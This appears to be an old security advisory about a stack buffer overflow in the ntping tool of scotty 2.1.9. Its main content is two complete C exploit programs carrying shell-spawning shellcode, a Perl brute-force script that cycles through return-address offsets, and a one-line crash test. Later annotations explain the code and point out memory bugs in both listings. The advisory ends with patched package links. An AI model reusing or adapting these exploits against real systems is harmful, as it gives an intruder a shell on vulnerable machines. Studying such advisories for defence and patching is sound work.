COMMAND

    scotty (ntping)

SYSTEMS AFFECTED

    scotty (ntping)

PROBLEM

    'KF' found the following:

        [root@linux d0tslash]# /usr/bin/ntping `perl -e 'print "A" x 9000'`
        Segmentation fault (core dumped)

    Here is an exploit people were toying with.  Perhaps someone with
    better overflow skills can tweak it a bit.  Larry W. Cashdollar
    got it to spit out a shell at various offsets; you can use the
    brute.pl script to automate the process (tested on Mandrake 8.0).

    Code:

    /*Larry W. Cashdollar                6/13/2001
      http://vapid.dhs.org               Vapid Labs
      Overflows ntping for scotty-2.1.9 based on post by
      dotslash@snosoft.com*/

    #include <stdio.h>
    #include <stdlib.h>

    #define NOP 0x90		/*no operation skip to next instruction. */
    #define LEN 798			/*our buffersize. */

    /* Raw i386 machine code followed by the literal "/bin/sh": Aleph1's
       classic shell-spawning payload.  It lacks a call to setuid(0), so the
       shell keeps whatever privileges ntping was running with. */
    char shellcode[]= /*Aleph1's shell code. */
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    /*Nab the stack pointer to use as an index into our nop's*/
    /* Returns the current stack pointer.  The AT&T-syntax inline asm copies
       %esp into %eax and the function has no return statement, so the value
       reaches the caller only because the i386 convention returns a long in
       %eax (GCC/i386-specific; undefined behaviour in standard C).  main()
       uses the result as a rough guess of where the target's stack lies. */
    long
    get_sp ()
    {
      __asm__ ("mov %esp, %eax");	/* no return statement: caller reads %eax */
    }

    /* Builds the oversized argv[1] that the advisory uses against ntping and
       hands it to /usr/sbin/ntping via execl().
       argv[1] (of this program): decimal offset added to the sampled stack
         pointer to form the guessed return address; atoi() is called on it
         without checking argc.
       Layout written into buffer[LEN]: every 4-byte slot is first set to the
       guessed address, indices 550 .. LEN-strlen(shellcode)-50 are then
       overwritten with NOPs, and the shellcode is copied immediately after
       the NOP run.  The copies of the address left after the shellcode are
       what the exploit expects to land on the saved return address in
       ntping's frame (this depends on ntping's exact stack layout, which is
       not shown here). */
    int
    main (int argc, char *argv[])
    {
      char buffer[LEN];		/* payload; never explicitly NUL-terminated */
      int i;

      long retaddr = get_sp ();	/* this process's %esp, used as a proxy for the target's */

    /* Fill the whole buffer with the guessed address (stack pointer + offset).
       LEN (798) is not a multiple of 4, so the final 4-byte store at i = 796
       writes 2 bytes past the end of buffer. */
      for (i = 0; i < LEN; i += 4)
        *(long *) &buffer[i] = retaddr + atoi (argv[1]);

    /* Overwrite the middle of the buffer with NOPs, leaving room for the
       shellcode and a trailing run of address copies. */

      printf ("Jumping to address %x BufSize %d\n", retaddr + atoi (argv[1]),LEN);	/* %x with a long: same width on 32-bit x86 */

      for (i = 550; i < (LEN - strlen (shellcode) - 50); i++)
        *(buffer + i) = NOP;

    /* Copy the shellcode right after the NOP run; i still holds the index
       one past the last NOP. */
      memcpy (buffer + i, shellcode, strlen (shellcode));

      /* Replace this process with ntping, passing buffer as its only argument;
         execl() reads buffer as a C string up to the first zero byte.  The
         trailing 0, 0 terminate the variadic argument list.  The return value
         is not checked, so a failed exec simply falls off the end of main. */
      execl ("/usr/sbin/ntping", "ntping", buffer,0, 0);

    }

    brute.pl:

    #!/usr/bin/perl
    # Tries every offset from 50 to 1000 inclusive: runs ./wp (presumably the
    # compiled exploit above) with the offset as its only argument, then echoes
    # the offset so the last value printed shows where the run stopped.

    for ($X = 50; $X <= 1000; $X++) {
        system("./wp $X");
        print "$X\n";
    }

    Larry W. Cashdollar made his version of the exploit available at:

        http://vapid.dhs.org/ntping_exp.c

    Here it is:

    /*Larry W. Cashdollar                6/13/2001
      http://vapid.dhs.org               Vapid Labs
      Overflows ntping for scotty-2.1.9 based on post by
      dotslash@snosoft.com
      doesn't give root; privileges are dropped unless ntping has the setgid bit set.*/

    #include <stdio.h>
    #include <stdlib.h>

    #define NOP 0x90		/*no operation skip to next instruction. */
    #define LEN 590			/*our buffersize. */

    /* Raw i386 machine code followed by the literal "/bin/sh": Aleph1's
       classic shell-spawning payload.  It lacks a call to setuid(0), so the
       shell keeps whatever privileges ntping was running with. */
    char shellcode[]= /*Aleph1's shell code. */
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    /*Nab the stack pointer to use as an index into our nop's*/
    /* Returns the current stack pointer.  The AT&T-syntax inline asm copies
       %esp into %eax and the function has no return statement, so the value
       reaches the caller only because the i386 convention returns a long in
       %eax (GCC/i386-specific; undefined behaviour in standard C).  main()
       uses the result as a rough guess of where the target's stack lies. */
    long
    get_sp ()
    {
      __asm__ ("mov %esp, %eax");	/* no return statement: caller reads %eax */
    }

    /* Second variant of the payload builder: same idea as the first listing
       (fill buffer[LEN] with a guessed return address, append the shellcode,
       exec ntping with buffer as argv[1]), but the NOP loop is commented out.
       argv[1] (of this program): decimal offset added to the sampled stack
         pointer; atoi() is called on it without checking argc. */
    int
    main (int argc, char *argv[])
    {
      char buffer[LEN];		/* payload; never explicitly NUL-terminated */
      int i;

      long retaddr = get_sp ();	/* this process's %esp, used as a proxy for the target's */

    /* Fill the whole buffer with the guessed address (stack pointer + offset).
       LEN (590) is not a multiple of 4, so the final 4-byte store at i = 588
       writes 2 bytes past the end of buffer, and the loop leaves i == 592. */
      for (i = 0; i < LEN; i += 4)
        *(long *) &buffer[i] = retaddr + atoi (argv[1]);

    /* The NOP sled has been disabled in this version (see the commented-out
       loop below), so nothing here leaves space for shellcode and pointers. */

      printf ("Jumping to address %x BufSize %d\n", retaddr + atoi (argv[1]),LEN);	/* %x with a long: same width on 32-bit x86 */
    /*
      for (i = 0; i < (LEN - strlen (shellcode) - 100); i++)
        *(buffer + i) = NOP;*/

    /* Copy the shellcode at buffer + i.  Because the NOP loop is commented out,
       i still holds the value left by the fill loop (592, beyond LEN), so as
       listed this memcpy writes the shellcode entirely outside the declared
       array, onto this process's own stack, rather than into buffer. */
      memcpy (buffer + i, shellcode, strlen (shellcode));

      /* Replace this process with ntping, passing buffer as its only argument;
         execl() reads buffer as a C string up to the first zero byte.  The
         trailing 0, 0 terminate the variadic argument list.  The return value
         is not checked, so a failed exec simply falls off the end of main. */
      execl ("/usr/sbin/ntping", "ntping", buffer,0, 0);

    }

SOLUTION

    Fixed in scotty 2.1.11.  For SuSE:

        ftp://ftp.suse.com/pub/suse/i386/update/7.0/tcl2/scotty-2.1.10-315.i386.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/7.0/zq1/scotty-2.1.10-315.src.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/6.4/tcl2/scotty-2.1.10-314.i386.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/6.4/zq1/scotty-2.1.10-314.src.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/6.3/tcl2/scotty-2.1.10-314.i386.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/6.3/zq1/scotty-2.1.10-314.src.rpm
        ftp://ftp.suse.com/pub/suse/sparc/update/7.0/tcl2/scotty-2.1.10-268.sparc.rpm
        ftp://ftp.suse.com/pub/suse/sparc/update/7.0/zq1/scotty-2.1.10-268.src.rpm
        ftp://ftp.suse.com/pub/suse/axp/update/7.0/tcl2/scotty-2.1.10-273.alpha.rpm
        ftp://ftp.suse.com/pub/suse/axp/update/7.0/zq1/scotty-2.1.10-273.src.rpm
        ftp://ftp.suse.com/pub/suse/axp/update/6.4/tcl2/scotty-2.1.10-272.alpha.rpm
        ftp://ftp.suse.com/pub/suse/axp/update/6.4/zq1/scotty-2.1.10-272.src.rpm
        ftp://ftp.suse.com/pub/suse/axp/update/6.3/tcl2/scotty-2.1.10-274.alpha.rpm
        ftp://ftp.suse.com/pub/suse/axp/update/6.3/zq1/scotty-2.1.10-274.src.rpm
        ftp://ftp.suse.com/pub/suse/ppc/update/7.0/tcl2/scotty-2.1.10-274.ppc.rpm
        ftp://ftp.suse.com/pub/suse/ppc/update/7.0/zq1/scotty-2.1.10-274.src.rpm
        ftp://ftp.suse.com/pub/suse/ppc/update/6.4/zq1/scotty-2.1.10-274.src.rpm